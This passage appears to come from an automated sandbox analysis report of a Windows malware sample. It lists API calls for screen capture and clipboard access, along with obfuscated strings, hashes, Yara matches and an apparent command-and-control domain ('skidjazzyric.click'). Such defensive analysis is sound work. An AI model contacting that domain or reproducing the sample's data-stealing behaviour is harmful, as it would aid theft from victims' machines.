                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 004369D0
                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004369E7
                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelect
                                                                        • String ID: Y
                                                                        • API String ID: 1298755333-3233089245
                                                                        • Opcode ID: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
                                                                        • Instruction ID: ce6842184c50d62c14bce23637ee5c5f438d7dfa952fd3edf86735d4080956a5
                                                                        • Opcode Fuzzy Hash: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
                                                                        • Instruction Fuzzy Hash: 4A81C33A158310EFD7489FB4AC49A3B7BA5FB8A352F050C3CF546D2290C73995168B2B
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                        • String ID: @$B$C$E$F$K$N$O$t${$}
                                                                        • API String ID: 2832541153-984153585
                                                                        • Opcode ID: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
                                                                        • Instruction ID: d12379fae56aa42f0d26b1a9ba346e1c7749dd96ee15ae9ce42ccc61be201c2c
                                                                        • Opcode Fuzzy Hash: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
                                                                        • Instruction Fuzzy Hash: 65418FB050C3818ED301EF78D58931FBFE0AF96318F05492EE4C996292D67D8549CBAB
                                                                        APIs
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 004251AA
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00425243
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandStrings
                                                                        • String ID: +$e$+$e$%\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f$XY$]RB
                                                                        • API String ID: 237503144-2846770461
                                                                        • Opcode ID: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
                                                                        • Instruction ID: b6d59b0557f70d7ec2d4011febfa6e18cf4a5b2df19338a98cc8181bc2575411
                                                                        • Opcode Fuzzy Hash: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
                                                                        • Instruction Fuzzy Hash: E7F1EDB4208350DFD310DF69E89166BBBE0FFC5314F54892DE5958B362E7B88906CB46
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?), ref: 00419CE7
                                                                        • FreeLibrary.KERNEL32(?), ref: 00419D24
                                                                          • Part of subcall function 004402C0: LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary$InitializeThunk
                                                                        • String ID: ~|$SP$if$Wu$pv$tj$vt
                                                                        • API String ID: 764372645-1279135394
                                                                        • Opcode ID: 6f3e0809db8a7ee577943ce01a0a1cb86fff2ea56a37afda839586e8e533a568
                                                                        • Instruction ID: c1c817f51924b2b6e01bbc71c3bfe870e6f9d21007064de5033cd7ab66586395
                                                                        • Opcode Fuzzy Hash: 6f3e0809db8a7ee577943ce01a0a1cb86fff2ea56a37afda839586e8e533a568
                                                                        • Instruction Fuzzy Hash: 5D624770609310AFE724CB15DC9176BB7E2EFC5314F18862DF495973A1D378AC858B4A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8I>K$T`Sf$Wdz$&$$qs$uVw
                                                                        • API String ID: 0-2419925205
                                                                        • Opcode ID: b98f95cc8d7a7bfe044da580c8a45b468910242ccf89acd057331744f3faff64
                                                                        • Instruction ID: c261d025133841230159ca5431fd9423a817dc7e9349410c690f11e8db15d26c
                                                                        • Opcode Fuzzy Hash: b98f95cc8d7a7bfe044da580c8a45b468910242ccf89acd057331744f3faff64
                                                                        • Instruction Fuzzy Hash: FA7283B4A05269CFDB24CF55D881BDDBBB2FB46300F1181E9C5496B362DB349A86CF84
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8I>K$T`Sf$Wdz$&$$qs$uVw
                                                                        • API String ID: 0-2419925205
                                                                        • Opcode ID: 7f03e2cf2ff76769e2eca3cb1bafa80f1ab81eb052e5b20bbb5ada621e185149
                                                                        • Instruction ID: 2e82740579f7d5d90379f769cffc20af85584b7e0a434fdcbb06edc383543e27
                                                                        • Opcode Fuzzy Hash: 7f03e2cf2ff76769e2eca3cb1bafa80f1ab81eb052e5b20bbb5ada621e185149
                                                                        • Instruction Fuzzy Hash: 34422CB0905369CFDB64CF56D981BCCBBB1FB05300F1185E8C59A6B262DB748A86CF85
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID: ~|$SP$if$pv$tj$vt
                                                                        • API String ID: 3664257935-1422159894
                                                                        • Opcode ID: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
                                                                        • Instruction ID: 1c6f201f01f7b76a730d7886f79e0a65450125d3040e26e269bc7b54ee1cbe8e
                                                                        • Opcode Fuzzy Hash: 557abf3bdc5e1b4c31fa4c16cb7a998475db0352c266ee35ae4fbd844e0422db
                                                                        • Instruction Fuzzy Hash: 68622870689350AFE724CF14CC91B2FB7E2EFC5318F19862CE4999B290DB71A805CB55
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 5&'d$O$~
                                                                        • API String ID: 0-1622812124
                                                                        • Opcode ID: 19bfc54354d9903b26eacf0161f96faf57e28913ce884c947f78354b466abfc6
                                                                        • Instruction ID: 7c8e188e2ff574dc84e1e58bec60109b2722ae2eee07efcef2931a8160e5a92b
                                                                        • Opcode Fuzzy Hash: 19bfc54354d9903b26eacf0161f96faf57e28913ce884c947f78354b466abfc6
                                                                        • Instruction Fuzzy Hash: AC820F7550C3518BC324CF28C8917ABB7E1FF99314F198A6EE4C99B391E7389941CB4A
                                                                        APIs
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004258F4
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0042595D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandStrings
                                                                        • String ID: B"@$)RSP$=^"\$`J/H$rp
                                                                        • API String ID: 237503144-816972838
                                                                        • Opcode ID: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
                                                                        • Instruction ID: cd6e5e946c3164ee33c4da05371f075d598195140dbb1deecb8ac0c04a2143aa
                                                                        • Opcode Fuzzy Hash: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
                                                                        • Instruction Fuzzy Hash: 9DA110B6E402188FDB10CFA8DC827EEBBB1FF85314F154169E414AB291D7B59942CB94
                                                                        APIs
                                                                          • Part of subcall function 00436980: GetDC.USER32(00000000), ref: 00436989
                                                                          • Part of subcall function 00436980: GetSystemMetrics.USER32(0000004C), ref: 00436999
                                                                          • Part of subcall function 00436980: GetSystemMetrics.USER32(0000004D), ref: 004369A1
                                                                          • Part of subcall function 00436980: GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
                                                                          • Part of subcall function 00436980: GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
                                                                          • Part of subcall function 00436980: DeleteObject.GDI32(00000000), ref: 004369C1
                                                                          • Part of subcall function 00436980: CreateCompatibleDC.GDI32(00000000), ref: 004369D0
                                                                          • Part of subcall function 00436980: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
                                                                          • Part of subcall function 00436980: SelectObject.GDI32(00000000,00000000), ref: 004369E7
                                                                          • Part of subcall function 00436980: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A
                                                                        • CoUninitialize.OLE32 ref: 0040D555
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelectUninitialize
                                                                        • String ID: &W-Q$9Y$?C*]$skidjazzyric.click$|qay$~wxH
                                                                        • API String ID: 3213364925-1525209810
                                                                        • Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                        • Instruction ID: aef483f231ee1e61a479db6060b0077f9689b526eef662d52e770a901b229f69
                                                                        • Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                        • Instruction Fuzzy Hash: EEB115756047818BE325CF2AC4D0762BBE2FF96300B18C5ADC4D64BB86D738A806CB95
                                                                        APIs
                                                                          • Part of subcall function 02166BE7: GetDC.USER32(00000000), ref: 02166BF0
                                                                          • Part of subcall function 02166BE7: GetCurrentObject.GDI32(00000000,00000007), ref: 02166C11
                                                                          • Part of subcall function 02166BE7: GetObjectW.GDI32(00000000,00000018,?), ref: 02166C21
                                                                          • Part of subcall function 02166BE7: DeleteObject.GDI32(00000000), ref: 02166C28
                                                                          • Part of subcall function 02166BE7: CreateCompatibleDC.GDI32(00000000), ref: 02166C37
                                                                          • Part of subcall function 02166BE7: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02166C42
                                                                          • Part of subcall function 02166BE7: SelectObject.GDI32(00000000,00000000), ref: 02166C4E
                                                                          • Part of subcall function 02166BE7: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 02166C71
                                                                        • CoUninitialize.COMBASE ref: 0213D7BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelectUninitialize
                                                                        • String ID: &W-Q$9Y$?C*]$skidjazzyric.click$|qay$~wxH
                                                                        • API String ID: 3248263802-1525209810
                                                                        • Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                        • Instruction ID: 4d996937e67107be7583d5bd0f11cf589042adf8d43c6782d465d1234c5f76a2
                                                                        • Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                        • Instruction Fuzzy Hash: EEB116756447818BE726CF2AC8D0762BBE2FF96304B18C1ACC4D64FB4AD778A446CB51
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
                                                                        • API String ID: 0-102253164
                                                                        • Opcode ID: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
                                                                        • Instruction ID: 7c24634cc790d3dc5544db0222c0a2221dcce8583ae8b0beabc19f11c9a677e2
                                                                        • Opcode Fuzzy Hash: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
                                                                        • Instruction Fuzzy Hash: 923202B19402118BCB24CF24CC927A7B7B2FF95314F28829DD851AF395E779A842CBD5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
                                                                        • API String ID: 0-102253164
                                                                        • Opcode ID: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
                                                                        • Instruction ID: 0d719960aefe33f8eccab292700c487a7ee2f871c274d9e6adc619a41167b4d8
                                                                        • Opcode Fuzzy Hash: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
                                                                        • Instruction Fuzzy Hash: EE3238B19412118BCB24CF24C8927B7B7B2FF95318F28829DD8456F794EB75A902CBD1
                                                                        APIs
                                                                        • GetCurrentProcessId.KERNEL32 ref: 02138B0B
                                                                        • GetCurrentThreadId.KERNEL32 ref: 02138B15
                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02138BBC
                                                                        • GetForegroundWindow.USER32 ref: 02138BD1
                                                                        • ExitProcess.KERNEL32 ref: 02138D1E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                        • String ID: 6W01
                                                                        • API String ID: 4063528623-326071965
                                                                        • Opcode ID: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
                                                                        • Instruction ID: d90e5dc77895b5b0f38803e6a81529f95584e548bbffaab41161a9a3b6b5a684
                                                                        • Opcode Fuzzy Hash: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
                                                                        • Instruction Fuzzy Hash: E3517D73A843040FD728AF649C45356BAC79FC1314F1FC139A995AB3E5EA75880687C5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "G3A$%K9U$2W<Q$<O)I$>C;M$>C;M"G3A$?S2]$?_%Y
                                                                        • API String ID: 0-2668584225
                                                                        • Opcode ID: d10a81d34372c35a96c2f8986c5506c0c6912e9abd80cece7959baf4c885c2f5
                                                                        • Instruction ID: 1eff8263789fd2a08f3fecf0f268f16acf59bb1ac0ae24da522a1f75b62227ff
                                                                        • Opcode Fuzzy Hash: d10a81d34372c35a96c2f8986c5506c0c6912e9abd80cece7959baf4c885c2f5
                                                                        • Instruction Fuzzy Hash: 28E101756083108BC324CF64C89276BB7F1EFE6314F498A5DE4D69B3A4E3389905CB96
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "G3A$%K9U$2W<Q$<O)I$>C;M$>C;M"G3A$?S2]$?_%Y
                                                                        • API String ID: 0-2668584225
                                                                        • Opcode ID: 16124e3c7090e407d3ed762d4f9537a2d591ac8c3946b942d40811c92b540754
                                                                        • Instruction ID: cffbfb4312d4aca6b42af65a8d9ad58e11ee08d47241b9b3ec6d5f2acccaedd9
                                                                        • Opcode Fuzzy Hash: 16124e3c7090e407d3ed762d4f9537a2d591ac8c3946b942d40811c92b540754
                                                                        • Instruction Fuzzy Hash: 7AE1E071548350CBC725DF64C89276BB7F2EF86324F198A5CE8E98B390E3749905CB92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: J+$JW$]_$bX_^$r}B$+5$/)$3=
                                                                        • API String ID: 0-2499027453
                                                                        • Opcode ID: 929424e9da50b117192bea9d5fa077e9e13fbba52b5cd1fa525d3b1ff89fed60
                                                                        • Instruction ID: 44c300c69855992b2f16a9d4ad0dfeec6e614c77fc8171f72a5c7ce453eec0d9
                                                                        • Opcode Fuzzy Hash: 929424e9da50b117192bea9d5fa077e9e13fbba52b5cd1fa525d3b1ff89fed60
                                                                        • Instruction Fuzzy Hash: 9FD1DEB461C340DFE7249F25E881B6BB7A2FBC6304F94892DF1858B391DB749805CB5A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6C(]$?_oY$@w@q$Bc*}$K{Du$`/()$fWpQ
                                                                        • API String ID: 0-74227037
                                                                        • Opcode ID: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
                                                                        • Instruction ID: 6cbb9b4a16d706e95eb7c5eb543f19fb0438a443f67131002351f3f2f8f3bf58
                                                                        • Opcode Fuzzy Hash: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
                                                                        • Instruction Fuzzy Hash: FA1299B5205B01CFD324CF25D891B97BBF6FB45314F058A2DD5AA8BAA0DB74A406CF84
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: +$<$H)G+$NmNo$]a_c$tu
                                                                        • API String ID: 0-4096164410
                                                                        • Opcode ID: 00c84f4a00f370efcd5a995a9a9107818abea52a60fb4f74658ed92934ea930d
                                                                        • Instruction ID: c7a3f77f71ded0b9311dc6516a729683f4fb7c759b6558f4b3eb03d829b5ec1a
                                                                        • Opcode Fuzzy Hash: 00c84f4a00f370efcd5a995a9a9107818abea52a60fb4f74658ed92934ea930d
                                                                        • Instruction Fuzzy Hash: 925216741093509FD724CF28C8917ABB7E1FF86314F184A6DE4D68B391DB38A845CB9A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8)*6$8)*6$:33F$Ds$]f$}v
                                                                        • API String ID: 0-771823803
                                                                        • Opcode ID: 7a3e19719626faba5c99d689b52e2aeecc2c57281bd7adea87c94ef03e1a3679
                                                                        • Instruction ID: 415c6ff438417329eae15ed8e7d658c137838348542c9c9b1d71c747cb23f456
                                                                        • Opcode Fuzzy Hash: 7a3e19719626faba5c99d689b52e2aeecc2c57281bd7adea87c94ef03e1a3679
                                                                        • Instruction Fuzzy Hash: 88B1F67520C3408BD324CF6884546AFBBE1EFD2304F18896DE8D56B391D779890ACB9E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8)*6$8)*6$:33F$Ds$]f$}v
                                                                        • API String ID: 0-771823803
                                                                        • Opcode ID: 50f1edfc2bafa0014d11b6723b84b375855532d8b2d3c37a471b1a8907bb870b
                                                                        • Instruction ID: a886baf098a2d38b88050e3689bb3f84f9185348e5fed3cbba4f2dc11697e0fe
                                                                        • Opcode Fuzzy Hash: 50f1edfc2bafa0014d11b6723b84b375855532d8b2d3c37a471b1a8907bb870b
                                                                        • Instruction Fuzzy Hash: D6B1397524C3508BD325CF6884507AFFBE2AFD2218F48892CE4D64B351E775C60ACB5A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: )RSP$=^"\$B:$C@$K3$bX_^
                                                                        • API String ID: 0-3030200349
                                                                        • Opcode ID: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
                                                                        • Instruction ID: 361e1606381cfafdf419846c5dd42b56ab67650ac9a68572a77bc4f7112e5621
                                                                        • Opcode Fuzzy Hash: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
                                                                        • Instruction Fuzzy Hash: 77B120B6E002288FDB20CF68DC427DEBBB1FB85314F1981A9E418AB351D7785D468F91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: S"(w$S"(w$d5fg$d5fg$f
                                                                        • API String ID: 2994545307-2961185688
                                                                        • Opcode ID: 0d78e0e6ed5534702665f3e437abebaaa5f5fc6afa26a53d6cab4ff82d69c05f
                                                                        • Instruction ID: d96f39f5747abd94facca9cdfd6dc8715fedad9b00cb7f1fec3a1bbed5632043
                                                                        • Opcode Fuzzy Hash: 0d78e0e6ed5534702665f3e437abebaaa5f5fc6afa26a53d6cab4ff82d69c05f
                                                                        • Instruction Fuzzy Hash: E812C575A093519FC724CF18C880B2BB7E1AFC9314F18963EE8A4573A1D775DC098B9A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: S"(w$S"(w$d5fg$d5fg$f
                                                                        • API String ID: 0-2961185688
                                                                        • Opcode ID: 0d95f729ef3d477b1c9e30a1fac3cff8fc80ecb0f431d978f2f91dfa0851ceaa
                                                                        • Instruction ID: 006b03d8e09a364fa5d8552443c0f155c4fa80e54080b2f3e0896ab3507e9ae6
                                                                        • Opcode Fuzzy Hash: 0d95f729ef3d477b1c9e30a1fac3cff8fc80ecb0f431d978f2f91dfa0851ceaa
                                                                        • Instruction Fuzzy Hash: 9812F5756493519FC324CF18D884B3EB7E2AFC9318F18866CE4A6477A1D771E816CB82
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "#$H}}C$J'N!$LMR|$vu~r
                                                                        • API String ID: 0-1530353048
                                                                        • Opcode ID: 8f0a109eb01666b980d5d4ea6aa88c69ad077d8ae26429a0f6b9f90d2ad26799
                                                                        • Instruction ID: 7cb9c3f936be8fd3a75d1e4abfb2bd6291e29c03686ec294c1ddfd7f13708a2f
                                                                        • Opcode Fuzzy Hash: 8f0a109eb01666b980d5d4ea6aa88c69ad077d8ae26429a0f6b9f90d2ad26799
                                                                        • Instruction Fuzzy Hash: 0DE16CB5608351CFC7108F24A84126FB7E1AF96308F58487EE8C597342DB39DC05CB5A
                                                                        Strings
                                                                        Memory Dump Source
